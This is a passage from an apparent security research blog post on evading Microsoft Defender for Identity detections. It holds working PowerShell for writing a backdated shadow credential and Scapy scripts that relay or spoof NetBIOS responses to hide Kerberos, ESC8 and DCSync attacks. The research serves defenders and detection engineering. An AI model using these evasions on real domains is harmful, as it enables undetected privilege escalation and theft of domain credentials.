Synacktiv’s blog post here lists the eTypes that are common in legitimate applications and can be used to bypass this alert. As of March 2026, when this article was written, the evasion still worked against DfI versions 2.2 and 3.0. The following Wireshark capture shows an AS-REQ built with an adjusted version of Rubeus that uses legitimate eTypes:

Figure 5: AS-REQ with legitimate eTypes
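The idea of fingerprinting by eTypes can be illustrated with a short sketch. The eType numbers and names below come from the Kerberos RFCs 3961, 3962, 4757 and 8009. However, the function name and the baseline used in the tests are hypothetical placeholders. They are neither the lists DfI uses nor the values from Synacktiv’s research. The order of the proposed eTypes is treated as part of the fingerprint, so lists are compared as ordered sequences.

```powershell
# Kerberos eType numbers and names (RFC 3961, 3962, 4757 and 8009).
$ETypeNames = @{
    1  = 'des-cbc-crc';                3  = 'des-cbc-md5'
    17 = 'aes128-cts-hmac-sha1-96';    18 = 'aes256-cts-hmac-sha1-96'
    19 = 'aes128-cts-hmac-sha256-128'; 20 = 'aes256-cts-hmac-sha384-192'
    23 = 'rc4-hmac';                   24 = 'rc4-hmac-exp'
}

# Hypothetical fingerprint check: the ordered eType list of an AS-REQ is compared
# with lists considered legitimate (each given as a comma-separated string).
function Test-ETypeFingerprint {
    param(
        [Parameter(Mandatory)][int[]]$Observed,
        [Parameter(Mandatory)][string[]]$KnownGood
    )
    $observedKey = $Observed -join ','
    $names = foreach ($e in $Observed) {
        if ($ETypeNames.ContainsKey($e)) { $ETypeNames[$e] } else { "unknown($e)" }
    }
    [pscustomobject]@{
        ETypes     = $names -join ', '
        # Whitespace is stripped so that '18, 17, 23' and '18,17,23' compare equal.
        Suspicious = ($KnownGood -replace '\s', '') -notcontains $observedKey
    }
}
```

With a placeholder baseline of '18,17,23', an AS-REQ proposing exactly 18, 17, 23 would pass, while any deviation in content or order would be flagged.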

Taking a deeper look at the detection logic

Interestingly, this tool-based detection is only the second step of the detection chain for this alert. In this step, DfI inspects the eTypes to decide whether an AS-REQ is suspicious. Before inspecting them, DfI checks whether the certificate was created more or less than two hours ago. It uses the certificate’s NotBefore value for this, i.e. the date from which the certificate is valid. The tool-based detection is only applied to certificates created within the last two hours. If NotBefore indicates that the certificate was created more than two hours ago, DfI does not investigate further. This holds even if an unmodified version of Rubeus with its default, fingerprintable eTypes is used.
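The observed decision chain can be summarized as a small model. It is a reconstruction from black-box testing, not Microsoft’s code. The function name is hypothetical, and the eType verdict is passed in as a boolean. Whether a certificate exactly two hours old counts as “old” is not known, so the boundary is a guess.

```powershell
# Model of the observed PKINIT alert chain (reconstructed from testing, not Microsoft's code).
function Get-PkinitAlertDecision {
    param(
        [Parameter(Mandatory)][datetime]$NotBefore,
        [Parameter(Mandatory)][bool]$ToolLikeETypes,   # verdict of the eType fingerprint
        [datetime]$Now = (Get-Date),
        [timespan]$Threshold = [timespan]::FromHours(2)
    )
    # Step 1: certificates that look older than the threshold are not inspected further.
    if (($Now - $NotBefore) -gt $Threshold) { return 'NoInspection' }
    # Step 2: only "fresh" certificates reach the tool-based eType check.
    if ($ToolLikeETypes) { return 'Alert' }
    return 'NoAlert'
}
```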

Shadow credentials and PKINIT

Knowing this behavior opens up another attack vector. Anyone able to modify the NotBefore value of a certificate used for Kerberos client authentication could bypass the whole detection chain. Certificates obtained through ADCS-ESC attacks, e.g. ESC1, are signed by the CA. They cannot be modified without breaking the signature, and the KDC would then reject the certificate when the TGT is requested. Setting a shadow credential, however, produces a self-signed certificate. Its NotBefore value can be set to a point in the past, which makes the creation date look different. This can be done with Michael Grafnetter’s DSInternals PowerShell module and the following code snippet from here. It makes it possible to write a shadow credential while controlling the self-signed certificate. The following part of the script generates the self-signed certificate:

$upn = 'ADM@jsc.lab'
$ownerDN = 'CN=ADM,OU=Test_User,DC=jsc,DC=lab'
$userSid = 'S-1-5-21-1605340795-4164095229-358834758-7125'
$deviceID = (New-Guid)
$certificateSubject = '{0}/{1}/{2}' -f $userSid, $deviceID, $upn

# Every continued line ends with a backtick; a blank line would end the command early.
$certificate = New-SelfSignedCertificate -Subject $certificateSubject `
      -KeyLength 2048 `
      -Provider 'Microsoft Strong Cryptographic Provider' `
      -CertStoreLocation Cert:\CurrentUser\My `
      -NotBefore (Get-Date).AddHours(-2) `
      -NotAfter (Get-Date).AddYears(30) `
      -TextExtension '2.5.29.19={text}false', '2.5.29.37={text}1.3.6.1.4.1.311.20.2.2' `
      -SuppressOid '2.5.29.14' `
      -KeyUsage None `
      -KeyExportPolicy Exportable

The relevant part for the evasion is to set the NotBefore parameter to a value in the past:

-NotBefore (Get-Date).AddHours(-2)

After the certificate has been created, a key credential can be derived from it that is suitable to be written to the KCL attribute as a shadow credential:

$ngcKey = Get-ADKeyCredential -Certificate $certificate -DeviceId $deviceID -OwnerDN $ownerDN -CreationTime (Get-Date)

Set-ADObject -Identity $ngcKey.Owner -Add @{'msDS-KeyCredentialLink' = $ngcKey.ToDNWithBinary()}

As discussed in the section about shadow credentials (part “Shadow-credentials alert through PKINIT”), the creation of a shadow credential can be detected through the subsequent authentication against the KDC if DfI classifies that authentication as malicious, which then also triggers the alert for shadow credentials. As shown in this section, the pass-the-cert alert can be bypassed by waiting two hours or by making the certificate look older than two hours, although the latter only applies to self-signed certificates. Ultimately, this makes it possible to evade the pass-the-cert alert when creating shadow credentials, which in turn evades the alert for setting the shadow credential.

Network Name Resolution (NNR)

Network Name Resolution (NNR) is a core component that several alerts depend on, but it is vulnerable to spoofing and relaying, which makes it possible to evade multiple alerts.

The DfI documentation describes NNR as follows:
“Using NNR, Defender for Identity can correlate between raw activities (containing IP addresses), and the relevant computers involved in each activity. Based on the raw activities, Defender for Identity profiles entities, including computers, and generates security alerts for suspicious activities.”

NNR works by querying the IP address from which a potential attack originated for its NetBIOS host and domain name as well as its DNS name, using three primary methods:

  • NTLM over RPC (TCP port 135)
  • NetBIOS (UDP port 137)
  • Remote desktop protocol (TCP port 3389)

There is also a secondary method, which is used if none of the primary methods responds or if the responses from two or more primary methods conflict. The secondary method relies on DNS: the DfI agent performs a reverse DNS lookup of the IP address to obtain the machine's hostname.
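The order of primary and secondary methods can be summarised as a small decision function. This is a hedged sketch: each resolver is a hypothetical callable assumed to return an already normalised hostname (or None when there is no answer), and DfI's real conflict handling and name normalisation may differ.

```python
from typing import Callable, List, Optional

# Hypothetical resolver type: IP address -> normalised hostname, or None if there is no answer
Resolver = Callable[[str], Optional[str]]


def resolve_with_nnr(ip: str, primary: List[Resolver], secondary: Resolver) -> Optional[str]:
    """Use the primary methods first; fall back to DNS on no answer or a conflict."""
    answers = {name for name in (resolve(ip) for resolve in primary) if name is not None}
    if len(answers) == 1:
        return answers.pop()  # all answering primary methods agree
    return secondary(ip)      # no answer, or two or more primary methods disagree


# Stand-ins for NetBIOS, NTLM over RPC (no answer) and RDP, plus reverse DNS
print(resolve_with_nnr(
    "172.16.94.11",
    [lambda ip: "PC02", lambda ip: None, lambda ip: "PC02"],
    lambda ip: "PC02-DNS",
))  # PC02
```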

Using these methods, DfI can determine the origin of suspicious traffic and map it to a computer hostname, which makes it possible to distinguish between an attack and legitimate behavior. The next section uses an alert whose detection logic is based on NNR to explain how knowing the hostname of the suspicious computer helps DfI determine whether an attack occurred.

NNR in action: Suspected suspicious Kerberos ticket request

To illustrate the inner workings of NNR and its weakness, the scenario of obtaining TGTs with certificates is continued. Besides the already discussed alert “Suspicious certificate usage over Kerberos protocol (PKINIT)”, there is another alert related to requesting a TGT with a certificate via PKINIT. This alert is called “Suspected suspicious Kerberos ticket request” and has an interesting scope: the research showed that it only applies to attempts to authenticate as a domain controller machine account using a certificate.

For this example, it is assumed that the adversary is on PC02.jsc.lab (172.16.94.11) and has obtained a certificate for DC02 that allows Kerberos client authentication, for instance through shadow credentials or an ADCS-ESC vulnerability. When the attacker on PC02 uses the certificate to authenticate as DC02$ against DC01.jsc.lab, the DfI agent on DC01 sends NNR requests to the source IP address of the AS-REQ for DC02$, which is 172.16.94.11, to determine whether DC02 is actually located at this IP address. The flow is illustrated in the following image:

Figure 6: NNR flow

The only information the DfI agent has before starting the investigation using NNR is an AS-REQ requesting a TGT for DC02 and the source IP address of the suspicious machine. The AS-REQ provides a valid certificate with the subject DC02$, indicating that the certificate belongs to DC02$. The requester has also sent the signed timestamp, giving proof of possession of the private key.

Figure 7: AS-REQ DC02$

Therefore, it makes sense to have detection logic for this kind of request. In the case of Kerberos authentication, an AS-REQ for a domain controller machine account is expected to originate from the IP address of that domain controller. If a TGT for a domain controller machine account is requested from a machine other than the domain controller itself, as indicated by network attributes such as IP address and hostname, this strongly suggests that an adversary has obtained a valid certificate, for example through shadow credentials or ADCS-ESC-related attacks.

Inspection of NNR primary methods

Continuing with the example above, specific actions take place on DC01 and PC02 when the attacker on PC02 sends an AS-REQ for DC02 to the KDC on DC01. The reaction of the DfI agent on DC01 (172.16.94.1) to the incoming AS-REQ was inspected using Procmon:

Figure 8: DfI sensor process performing NNR

“Microsoft.Tri.Sensor.exe” is the DfI process that performs NNR. The first two entries, 1.) and 2.), are requests to and responses from PC02 using NetBIOS (UDP port 137). Entries 3.) to 6.) belong to the NNR method using the endpoint mapper (TCP port 135). Entry 7.) uses RDP (TCP port 3389).

When monitoring PC02, the incoming NNR requests can be observed, and each source port can be matched to the source ports in figure 8:

Figure 9: NBNS node status request

The NetBIOS request from the DfI agent to port 137 on PC02 can be noticed in figure 9. Furthermore, we can see the request at the DCE/RPC endpoint mapper on TCP port 135:

Figure 10: NTLM over RPC

Eventually, there is the connection to RDP on TCP port 3389:

Figure 11: RDP

NNR method: NetBIOS node status request

The NetBIOS request sent by DfI is a so-called NetBIOS node status request, a unicast request that retrieves NetBIOS-related information about an endpoint. The NetBIOS node status response from PC02 contains its NetBIOS hostname, its NetBIOS domain name and the NetBIOS service types. The hostname and domain name are the information the DfI agent uses to answer the question of whether the computer with IP address 172.16.94.11 (PC02) is in fact DC02. Since PC02 is not DC02, the NetBIOS information returned by PC02 leads DfI to raise an alert for this attack.

Figure 12: NetBIOS node status response (PC02)

The three highlighted areas in figure 12 contain the information that is essential for the detection logic. Each entry corresponds to one registered name, three in total. The first name, “JSC<00> (Workstation/Redirector)”, states that the NetBIOS domain name is “JSC”; the service type 0x00 represents a workstation. The other two names differ only in their service types, where 0x20 indicates a file server service. “PC02<00> (Workstation/Redirector)” indicates that the NetBIOS hostname is “PC02”.
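The name table inside the response has a simple fixed layout (RFC 1002, section 4.2.18): a one-byte name count followed by 18-byte entries, each consisting of a 15-byte space-padded name, a one-byte suffix and two bytes of flags. The sketch below parses that table and derives host and domain name the way the detection logic appears to use them. It assumes the RDATA has already been extracted from the packet; `host_and_domain` and `entry` are hypothetical helpers, and the flag values in the sample are assumed rather than read from the capture.

```python
import struct

GROUP_FLAG = 0x8000  # G bit of NAME_FLAGS (RFC 1002, section 4.2.18)


def parse_node_name_table(rdata: bytes):
    """Parse NUM_NAMES and the NODE_NAME entries at the start of a node status RDATA."""
    num_names = rdata[0]
    entries, offset = [], 1
    for _ in range(num_names):
        name = rdata[offset:offset + 15].decode("ascii").rstrip(" ")
        suffix = rdata[offset + 15]
        (flags,) = struct.unpack(">H", rdata[offset + 16:offset + 18])
        entries.append((name, suffix, bool(flags & GROUP_FLAG)))
        offset += 18  # 15-byte name + 1-byte suffix + 2-byte flags
    return entries


def host_and_domain(entries):
    """Hypothetical helper: hostname = unique <00> name, NetBIOS domain = group <00> name."""
    host = next(n for n, s, group in entries if s == 0x00 and not group)
    domain = next(n for n, s, group in entries if s == 0x00 and group)
    return host, domain


def entry(name: bytes, suffix: int, flags: int) -> bytes:
    """Hypothetical helper that builds one 18-byte name table entry for the sample."""
    return name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)


# The three names from PC02's response (flag values assumed)
rdata = bytes([3]) + entry(b"JSC", 0x00, 0x8400) + entry(b"PC02", 0x00, 0x0400) + entry(b"PC02", 0x20, 0x0400)
print(host_and_domain(parse_node_name_table(rdata)))  # ('PC02', 'JSC')
```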

The same NetBIOS request that DfI sends can also be triggered with the native Windows tool nbtstat, using nbtstat -A <ip>. The result, shown in the following image, contains the same information as the NetBIOS response inspected in Wireshark:

Figure 13: NetBIOS node status request using nbtstat

The alert can even be inspected before it appears in the Defender XDR portal by looking into the local log files. These are stored on the DC at “C:\Program Files\Azure Advanced Threat Protection Sensor\2.255.XXXXX.XXXXX\Logs\Microsoft.Tri.Sensor.log”. The collected information can be found in the log file:

Figure 14: Alert: “Suspected suspicious Kerberos ticket request” in logs

The log file shows an alert triggered by the use of a certificate for one machine account on another computer. The highlighted items “CertificateSubject=DC02$” and “SourceAccountName=jsc.lab\DC02$” are extracted from the AS-REQ and the provided certificate. “SourceComputerName=DomainName=JSC Name=PC02” is obtained from the NetBIOS node status response. These are the key values for the detection logic: if the NetBIOS hostname and NetBIOS domain name don’t match the certificate subject and account name, as in this case, the alert is raised. If the values match, no alert is raised.
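Expressed as code, the comparison described above amounts to roughly the following. This is a hypothetical reconstruction based only on the log fields shown in figure 14; the function names and the `expected_netbios_domain` parameter are assumptions, and DfI's actual normalisation rules are unknown.

```python
def account_host(name: str) -> str:
    """Hypothetical normalisation: 'jsc.lab\\DC02$' or 'DC02$' -> 'DC02'."""
    return name.split("\\")[-1].rstrip("$").upper()


def is_suspicious_dc_tgt_request(certificate_subject: str, source_account_name: str,
                                 resolved_host: str, resolved_domain: str,
                                 expected_netbios_domain: str) -> bool:
    """Hypothetical rule: alert unless the NNR result matches subject and account."""
    claimed = account_host(source_account_name)
    matches = (account_host(certificate_subject) == claimed == resolved_host.upper()
               and resolved_domain.upper() == expected_netbios_domain.upper())
    return not matches


# Values from the log entry: the AS-REQ for DC02$ came from PC02
print(is_suspicious_dc_tgt_request("DC02$", r"jsc.lab\DC02$", "PC02", "JSC", "JSC"))  # True
```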

Evasion using NetBIOS

Now that the detection logic for the alert “Suspected suspicious Kerberos ticket request” has been uncovered, evasion possibilities can be considered.

There are two ways to evade the alert or, more generally, to manipulate NNR. The first is to spoof a NetBIOS response by answering the DfI agent's NetBIOS node status request directly with the required NetBIOS information. The other is to take the incoming NetBIOS request from the DfI agent, relay it to the desired target and relay the response back to the DfI agent.

Relaying the NetBIOS node status request

To understand the relaying of the NetBIOS request, refer to the following two diagrams:

Figure 15: AS-REQ
Figure 16: Relaying of NetBIOS node status request/response

After the TGT has been requested (1 & 2), DfI starts NNR and asks the sender for its NetBIOS node status (3). A malicious actor can relay this NetBIOS request to the machine to which the TGT would belong, which is DC02 in the example (4). The response from DC02 (5) can then be relayed back via PC02 to DC01 (6). This evades the detection, because the AS-REQ and the certificate indicate DC02$ as the subject, and from the perspective of the DfI agent on DC01, the NetBIOS information from the machine that performed the AS-REQ appears to match DC02.

The relaying of the NetBIOS request can be implemented as a PoC using the Python library Scapy:

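from scapy.all import IP, UDP, NBNSHeader, sr1, send

def relay_nbns_node_status_request(pkt):
    dc01_ip = "172.16.94.1"   # DfI agent that sent the request
    dc02_ip = "172.16.94.4"   # machine whose identity is claimed
    udp_src_port = pkt[UDP].sport
    dc01_nbns_node_status_request = pkt[NBNSHeader]

    # Forward DC01's node status request to DC02 (UDP 137) and wait for its answer
    dc02_nbns_node_status_response = sr1(
        IP(dst=dc02_ip)/UDP(sport=137, dport=137)/dc01_nbns_node_status_request,
        timeout=2, verbose=False)
    if dc02_nbns_node_status_response is None:
        return  # DC02 did not answer on UDP 137, nothing to relay

    # Return DC02's answer to the DfI agent on DC01 from this host
    dc02_nbns_node_status_response = dc02_nbns_node_status_response[NBNSHeader]
    send(IP(dst=dc01_ip)/UDP(sport=137, dport=udp_src_port)/dc02_nbns_node_status_response, verbose=False)

# Usage: sniff(filter="udp dst port 137", prn=relay_nbns_node_status_request, store=False)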

The function takes a network packet (pkt) as its argument, which must have been sniffed beforehand; this can also be done with Scapy. The first block stores the relevant IP addresses and the UDP source port of the incoming packet and extracts the NetBIOS node status request sent by DC01.

The second block forwards the NetBIOS node status request to DC02 and receives DC02's NetBIOS node status response. The last block builds the response to DC01 and sends it.

When nbtstat is used again on DC01 to retrieve the NetBIOS information from PC02, it can be seen that the NetBIOS node status response was successfully tampered with: PC02 (172.16.94.11) now appears to be DC02.

Figure 17: Tampered NetBIOS node status response PC02 (relayed)

Performing the evasion via relaying has some advantages, but also certain disadvantages compared with the second method, which is presented next.

First, this variant is fast and straightforward, because there is no need to take care of individual values such as the NetBIOS hostname and NetBIOS domain name: the NetBIOS node status request is answered directly by the correct target. A further advantage is that the NetBIOS node status response is 100 % accurate, whereas with a manually spoofed response, values that are not important to the evasion may be ignored or overlooked, potentially creating indicators of compromise (IoCs). One example, visible in the image above, is the MAC address: it is not relevant to DfI's detection logic and can therefore be ignored when manually crafting a NetBIOS node status response, but it could theoretically serve as an IoC.

The biggest disadvantage of this approach is that it depends on another target (in this case another DC) being reachable on the relevant port, here UDP 137, to retrieve its NetBIOS information. If the target cannot be reached on UDP port 137, for instance due to firewalling or network issues, no NetBIOS information can be relayed back to the initial requester and the evasion fails. Therefore, manually crafting NetBIOS node status responses is discussed as well.

Spoofing the NetBIOS node status response

Technically, relaying a request to obtain a correct response differs from building the correct response oneself, but the outcome is essentially the same: a spoofed response is sent. This section shows how to build a spoofed NetBIOS node status response containing the information relevant to DfI. This can also be done using Scapy:

from scapy.all import IP, UDP, NBNSHeader, rdpcap, send

def send_spoofed_nbns_node_status_response(pkt):
    # Captured node status response from PC02, used as a template
    sample_nbns_node_status_response = rdpcap(r"PC02_nbns_node_status_response.pcap")[0]
    dfi_agent_ip = pkt[IP].src   # the DfI agent that sent the request
    udp_src_port = pkt[UDP].sport
    transaction_id = pkt[NBNSHeader].NAME_TRN_ID

    # Answer with the transaction ID of the incoming request
    spoofed_nbns_node_status_response = sample_nbns_node_status_response[NBNSHeader]
    spoofed_nbns_node_status_response.NAME_TRN_ID = transaction_id
    # 15 characters padded with spaces; the suffix byte is kept from the template
    spoofed_netbios_host_name = 'DC02'.ljust(15, " ")
    spoofed_netbios_domain_name = 'JSC'.ljust(15, " ")

    for nbns_entry in spoofed_nbns_node_status_response.NODE_NAME:
        if nbns_entry.NAME_FLAGS == 0x04:    # UNIQUE name -> hostname
            nbns_entry.NETBIOS_NAME = spoofed_netbios_host_name
        elif nbns_entry.NAME_FLAGS == 0x84:  # GROUP name -> domain name
            nbns_entry.NETBIOS_NAME = spoofed_netbios_domain_name

    send(IP(dst=dfi_agent_ip)/UDP(sport=137, dport=udp_src_port)/spoofed_nbns_node_status_response)

As a basis, a NetBIOS node status response from PC02 was captured and saved as a PCAP file, which is loaded and used as a template. In addition, the UDP source port and the transaction ID of the incoming request are stored.

In the second block, the node status response is given the transaction ID of the incoming request, and the spoofed NetBIOS names are prepared. NetBIOS names have a fixed length of 16 bytes: the name is padded with spaces to 15 bytes, and the 16th byte is the service-type suffix, which is already set in the sample. The last block replaces the names in the NetBIOS node status response with the spoofed NetBIOS names and sends the response.

The result can be seen in the comparison below: the left image shows the original NetBIOS node status from PC02, the right image the spoofed response generated with the script. The NetBIOS domain name remains “JSC”, since it was already correct.

Figure 18: Original node status PC02
Figure 19: Spoofed node status PC02

Comparing the spoofed response with the relayed one reveals a difference: the relayed response contains one more registered NetBIOS name. The entry “JSC <1C> GROUP Registered” is missing when spoofing the DC02 node status response with the previous script. A name with service type 1C indicates that the node is a domain controller of the domain (JSC). Although this looks like a relevant criterion for DfI when determining whether a request originates from a domain controller, as in the alert “Suspected suspicious Kerberos ticket request”, it is not used. The alert has the limited scope of identifying a request for a TGT of a domain controller machine account that was not made by the DC itself. Whether the node is registered as a domain controller in the domain is irrelevant; spoofing the correct NetBIOS hostname and domain name is sufficient for the evasion. A possible explanation is that the two other NNR methods cannot indicate through a single raw value whether an endpoint is registered as a domain controller, as the NetBIOS node status can. Additionally, the detection logic is designed to work with only one NNR method active in the environment, which means that every method must be able to detect all threats independently of the other NNR methods, with the same reliability.

Figure 20: Tampered NetBIOS node status response PC02 (relayed)
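The fixed-length name format used by the spoofing script can be isolated in a small helper. A minimal sketch, assuming the conventional upper-case ASCII names; `netbios_name` is a hypothetical helper, and the `<1C>` example corresponds to the domain controllers group name that was missing from the spoofed response.

```python
def netbios_name(name: str, suffix: int) -> bytes:
    """Hypothetical helper: 16-byte NetBIOS name = up to 15 characters padded with spaces + 1-byte suffix."""
    if len(name) > 15:
        raise ValueError("NetBIOS names are limited to 15 characters")
    if not 0 <= suffix <= 0xFF:
        raise ValueError("suffix must fit in one byte")
    return name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])


# <00> hostname entry and the <1C> domain controllers group entry
print(netbios_name("DC02", 0x00))
print(netbios_name("JSC", 0x1C))
```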

Additional considerations when evading NNR

Windows endpoint considerations

To evade NNR, two more things must be considered besides spoofing the NetBIOS node status response. First, DfI must not receive any NNR responses from the actual operating system (OS) of the machine used for the attack and the evasion. Otherwise, with the provided scripts, there would be a race condition between the spoofed, script-generated response and the legitimate, OS-generated response. To avoid this, incoming traffic to the destination ports used by NNR can be blocked on the attacker machine. The Windows firewall allows creating rules for incoming traffic, but local administrator privileges are required to modify it. Scapy uses Npcap to sniff and inject traffic on the network interface independently of the Windows OS and therefore of the firewall, too. With this approach, spoofed NNR responses can be sent to the DfI agent while the Windows OS is prevented from answering the NNR requests.

The other consideration is the two remaining NNR methods. According to the NNR documentation, at least one of the related ports should be opened on all devices in the environment when configuring DfI, so that at least one primary method works. This means DfI can perform detection when only one of the NNR methods is answered, so it is sufficient to respond to the NetBIOS method while ignoring the other two. This can also be achieved by blocking the corresponding ports on the attacker machine.

Cached NNR responses by Defender for Identity

Another aspect to consider when attempting to evade NNR-based detection is the caching of NNR responses. DfI agents in sensor version 2.2 frequently ask domain-joined devices for their hostnames using the described NNR requests and cache this information, regardless of whether suspicious traffic was received from these devices. If the DfI agent holds recently cached NNR information about a machine and a suspected attack from this machine occurs, the cached information can be used instead of querying the machine directly. This is a problem when trying to evade an NNR-based alert: if the DfI agent collected the machine's hostname right before the attack, the attacker machine may not be asked for its hostname at all, so no spoofed responses can be sent and the evasion fails. Therefore, the spoofing script must already be running on the machine, and the attacker must wait until the DfI agent automatically requests NNR information. The spoofed responses then poison the DfI cache. Afterwards, the attack covered by the respective NNR detection logic can be performed, and one of two things happens: either the DfI agent uses the spoofed, cached information, or the attacker machine is asked for its NNR information and spoofed responses are sent. Both result in successfully evading the alert.
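The effect of the cache on the evasion can be illustrated with a simple time-based cache. This is a hypothetical model, not DfI's implementation: the TTL value is an assumption (the actual cache lifetime was not determined), and `NnrCache` and `probe` are illustrative names.

```python
import time
from typing import Callable, Dict, Optional, Tuple


class NnrCache:
    """Hypothetical model: a fresh cache entry short-circuits active NNR probing."""

    def __init__(self, ttl_seconds: float, probe: Callable[[str], Optional[str]],
                 clock: Callable[[], float] = time.monotonic):
        self.ttl = ttl_seconds        # assumed lifetime, not measured
        self.probe = probe            # sends NNR requests to the machine
        self.clock = clock
        self._entries: Dict[str, Tuple[Optional[str], float]] = {}

    def resolve(self, ip: str) -> Optional[str]:
        now = self.clock()
        cached = self._entries.get(ip)
        if cached is not None and now - cached[1] < self.ttl:
            return cached[0]          # cached answer; the machine is not asked again
        name = self.probe(ip)         # periodic or alert-driven NNR request
        self._entries[ip] = (name, now)
        return name


fake_time = [0.0]
probes = []


def probe(ip):
    probes.append(ip)
    return "DC02"  # answered by the spoofing script during the periodic lookup


cache = NnrCache(ttl_seconds=600, probe=probe, clock=lambda: fake_time[0])
cache.resolve("172.16.94.11")      # periodic lookup poisons the cache
fake_time[0] = 60.0                # the attack happens a minute later
print(cache.resolve("172.16.94.11"), len(probes))  # DC02 1
```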

Indicators of Defender for Identity 2.2 usage in the environment

DfI 2.2 can potentially be fingerprinted from a compromised domain-joined machine. As described above, DfI frequently queries domain-joined devices for their hostnames using NNR requests. With the access required to sniff the network interface on a compromised host, one can look for the three primary NNR methods (NetBIOS node status request, RDP and NTLM over RPC) originating from a Windows server that could be running DfI. Specific characteristics of the RDP and NTLM over RPC messages that help to identify DfI 2.2 are described in the section “Reviewing the remaining NNR methods”. How confidently a Windows server can be identified as running DfI 2.2 depends on how many of the related ports are open on the attacker machine and on the network. The three NNR requests are sent together: if all three ports are open, all three messages arrive as a “bundle”, which strongly suggests that they come from DfI. If, however, two ports are closed and only UDP port 137 is open, a single NetBIOS node status request is not enough to attribute the traffic to DfI with high certainty.
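The bundle heuristic can be sketched as a grouping of observed inbound probes per source. A minimal sketch, assuming the packets have already been captured and reduced to (timestamp, source IP, protocol, destination port) tuples; the two-second window, the function name `likely_nnr_sources` and the second sample address are assumptions, not measured values.

```python
from collections import defaultdict

# (protocol, destination port) of the three primary NNR methods
NNR_PROBES = {("udp", 137), ("tcp", 135), ("tcp", 3389)}


def likely_nnr_sources(events, window_seconds=2.0):
    """Return sources that hit all three NNR ports within window_seconds (assumed window).

    events: iterable of (timestamp, source_ip, protocol, dst_port) seen on the local host.
    """
    by_source = defaultdict(list)
    for ts, src, proto, port in events:
        if (proto, port) in NNR_PROBES:
            by_source[src].append((ts, (proto, port)))
    hits = set()
    for src, probes in by_source.items():
        probes.sort()
        for i, (start, _) in enumerate(probes):
            seen = {probe for ts, probe in probes[i:] if ts - start <= window_seconds}
            if seen == NNR_PROBES:
                hits.add(src)
                break
    return hits


events = [
    (10.00, "172.16.94.1", "udp", 137),
    (10.05, "172.16.94.1", "tcp", 135),
    (10.20, "172.16.94.1", "tcp", 3389),
    (42.00, "172.16.94.20", "udp", 137),  # lone NetBIOS query: inconclusive
]
print(likely_nnr_sources(events))  # {'172.16.94.1'}
```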

ADCS-ESC8

DfI also includes an alert for the ADCS-ESC8 attack. To detect this attack, DfI must be installed on the relevant CA.

Attack overview

This attack technique targets Active Directory Certificate Services (AD CS) and allows an attacker who can relay the NTLM authentication of a machine account to obtain a certificate, usable for Kerberos authentication, in the name of the impersonated machine account. Additionally, certain requirements must be met for the CA’s web enrolment endpoint to be vulnerable to this attack. For further information, see the SpecterOps white paper Certified Pre-Owned: Abusing Active Directory Certificate Services.

This time, the actor is on kali.jsc.lab (172.16.94.13) performing the attack. The attack scenario looks like this:

Figure 21: ADCS-ESC8 simplified overview

Note that the ESC8 attack combines an authentication-coercion attack with NTLM relaying, which is only represented in a simplified way in this image. Effectively, the following happens:

  • The Kali machine forces the DC01 machine account to authenticate at the Kali machine using NTLM (1)
  • In step (2) and (3), Kali performs the authentication via NTLM as DC01 against the CA
  • In step (4), the attacker obtains a certificate in the name of DC01, which allows for later Kerberos authentication

Evading ESC8 using NNR

The detection logic for this alert also depends on the NNR feature. This time, the DfI agent installed on CA02 performs the detection. The question to be answered is whether the requester of the certificate for DC01 is indeed DC01. The certificate for DC01$ was issued in an exchange between the Kali machine and the CA. Therefore, DfI uses NNR to check whether the IP address 172.16.94.13 belongs to DC01.

Assuming no evasion technique is used and the Kali machine responds to the NNR requests, the flow would look as follows:

Figure 22: NNR flow after ESC8

Using the previously described NNR evasion technique, the ESC8 alert “Suspicious Domain Controller certificate request (ESC8)” can be evaded by impersonating the machine account in whose context the certificate was requested, DC01 in this example. When performing the ESC8 attack, DfI's detections for coercion attacks and NTLM relaying must be considered as well.

Comparing NNR usage for ESC8 to NTLM-relayed shadow credentials

An interesting inconsistency in DfI's use of NNR becomes apparent when comparing ESC8 with relayed shadow credentials. In the shadow credentials section, part “Computer to computer”, it was shown that shadow credentials can be set for machine accounts over an NTLM-relayed connection without triggering an alert. The question in the shadow-credentials scenario is the same as for ESC8: “Is the request made by the actual machine associated with the machine account, or by a different machine that successfully authenticated as that machine account via NTLM?” Yet for relayed shadow credentials, no NNR requests are sent to the machine from which the traffic for setting the shadow credential originated.

DCSync

Attack overview

A DCSync attack refers to an attacker controlling an entity with the privileges required to replicate parts of the domain. With access to such an entity, which could be a domain controller machine account, a highly privileged service account with replication rights or a domain administrator, an attacker can obtain sensitive data. For example, they could obtain the AES key of the krbtgt account, which is used to encrypt and sign TGTs in the domain, allowing them to forge golden tickets and establish persistence.

The DCSync alert is also vulnerable to spoofed NNR responses, since its detection logic is based on NNR. For the evasion, however, a distinction must be made according to the identity that performs the DCSync: while domain controllers always have replication rights, user and service accounts can also be granted them.

Evading DCSync alert using domain controller machine account

When performing DCSync attacks using the identity of a domain controller machine account, the detection is the same as for the alert “Suspected suspicious Kerberos ticket request” and the ESC8 alert, and the evasion works in the same way, too. If the attacker has obtained a TGT for DC02, the DCSync attack can be performed against DC01, answering the incoming NNR requests, pretending to be DC02 and vice versa.

Considerations for evading DCSync alert using service and user accounts

While detection and evasion of DCSync attacks using a domain controller machine account are reliable, this could not be tested conclusively for service and user accounts, because DfI's detection is unreliable for these account types.

There is, however, a hypothesis about one detection criterion used for these accounts. When DfI was successfully triggered for a DCSync alert using a self-created, non-default service or user account, the alert appeared in the portal with the following information: “PC02 is not a recognized domain controller” (see figure 23). In the tests, the attacks were performed from PC02 against DC01 using a self-created service account and a user account, both holding replication rights. Given that NNR requests are also sent to the machines from which DCSync attacks originate when service or user accounts are used, it is suspected that a DCSync originating from any domain controller may be considered legitimate. Unfortunately, the detection of DCSync attacks with these accounts is unreliable, which makes it hard to tell whether an evasion was successful.

Figure 23: DCSync alert with service account

Reviewing the remaining NNR methods

This blogpost focuses on the NNR method using NetBIOS. However, if UDP port 137 is not open on the network, NetBIOS cannot be used to evade the respective alerts, since the NetBIOS node status request never reaches the attacker and therefore cannot be answered with a spoofed response. Consequently, the other two methods must be inspected as well.

Remote desktop protocol (RDP)

